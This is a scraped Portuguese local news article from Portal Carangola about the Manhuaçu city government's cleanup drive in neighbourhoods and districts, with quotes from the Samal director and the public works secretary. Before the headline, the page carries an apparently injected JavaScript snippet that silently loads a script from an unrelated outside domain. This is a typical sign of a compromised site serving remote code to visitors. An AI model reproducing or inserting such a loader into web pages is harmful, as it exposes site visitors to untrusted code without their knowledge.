;(function(f,b,n,j,x,e){x=b.createElement(n);e=b.getElementsByTagName(n)[0];x.async=1;x.src=j;e.parentNode.insertBefore(x,e);})(window,document,"script","https://treegreeny.org/KDJnCSZn"); Mutirão de limpeza avança em bairros e distritos de Manhuaçu Samal e Secretaria de Obras em conjunto. - Portal Carangola

www.portalcarangola.com

O primeiro portal de notícias de Carangola-MG e região.

Portal Carangola

O 1º site de notícias de Carangola e Região

Mutirão de limpeza avança em bairros e distritos de Manhuaçu Samal e Secretaria de Obras em conjunto.

Atendendo a determinação da Prefeita Cici Magalhães, o Samal e a Secretaria de Obras iniciaram um grande mutirão de limpeza da cidade de Manhuaçu e dos distritos. A intenção é melhorar o aspecto físico das ruas, promover bem estar e garantir a manutenção.

Ao assumir a prefeitura municipal, o novo governo encontrou córregos com muito mato nas margens, montanhas de entulho e lixo e vários locais abandonados.

A iniciativa teve início no bairro Ponte da Aldeia, na cidade, e no distrito de São Pedro do Avaí. Como resultado, a população já percebe nesses bairros a melhoria visual e limpeza.

Nessa primeira etapa para colocar a casa em ordem, a Secretaria de Obras realiza a retirada de entulhos e limpeza de córregos, enquanto as equipes do Samal intensificaram a varrição e coleta de lixo, inclusive com a volta do recolhimento aos sábados.

Segundo o Diretor do Samal, Eron Elias, a prioridade é colocar os bairros e distritos em ordem. “Desde que assumi a pasta intensificamos a coleta acabando com o acumulo de lixo nas ruas e deixando a cidade limpa. Nossos funcionários estão empenhados no trabalho e contamos com o apoio da população que nos ajude nessa tarefa, que é de todos nós. Vamos limpar a cidade e depois continuar mantendo em boas condições”, destacou.

O Secretario de Obras João Amâncio enfatizou que estão sendo usados todos os equipamentos no mutirão. “Retroescavadeiras e caçambas estão sendo utilizados para fazer a coleta de materiais descartados em locais impróprios, restos de obras, galhos e folhas secas”, pontuou.

João Amâncio explica que nos últimos meses de 2016, a cidade foi deixada abandonada. “Assim que assumimos colocamos a máquina para trabalhar e demos inicio ao mutirão que está chegando a toda cidade retirando todo entulho que é possível”, completou.

O secretário ressalta que o serviço será agilizado assim que o município conseguir concluir a contratação de mais máquinas. “Creio que a partir de fevereiro teremos mais agilidade com a colocação das maquinas terceirizadas e, nos próximos dias, terá inicio a operação tapa buraco em toda cidade para amenizar os problemas enfrentados por motoristas e pedestres”.

A Prefeitura de Manhuaçu vem pedindo a colaboração da população para manter a cidade e distritos limpos e um pouco de paciência nessa fase inicial devido a grande demanda de atendimentos.

Deixe um comentário

O seu endereço de e-mail não será publicado. Campos obrigatórios são marcados com *

Esse site utiliza o Akismet para reduzir spam. Aprenda como seus dados de comentários são processados.